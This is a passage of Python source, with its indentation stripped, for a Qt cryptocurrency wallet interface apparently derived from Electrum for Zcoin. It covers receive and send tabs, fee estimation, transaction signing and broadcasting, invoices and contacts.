dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Zcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Zcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Zcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
self.feerate_e.setAmount(fee_rate // 1000)
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 2 if self.fee_unit else 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
displayed_feerate = displayed_feerate // 1000 if displayed_feerate else 0
displayed_fee = displayed_feerate * size
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = displayed_fee // size if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
if feerounding:
self.feerounding_icon.setToolTip(
_('additional {} satoshis will be added').format(feerounding))
self.feerounding_icon.setVisible(True)
else:
self.feerounding_icon.setVisible(False)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()
amount = 0 if amount is None else amount
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Zcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Zcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
            self.show_error(_('Invalid Zcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.get_list_header())
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
                    f.write(pr.raw)
                self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
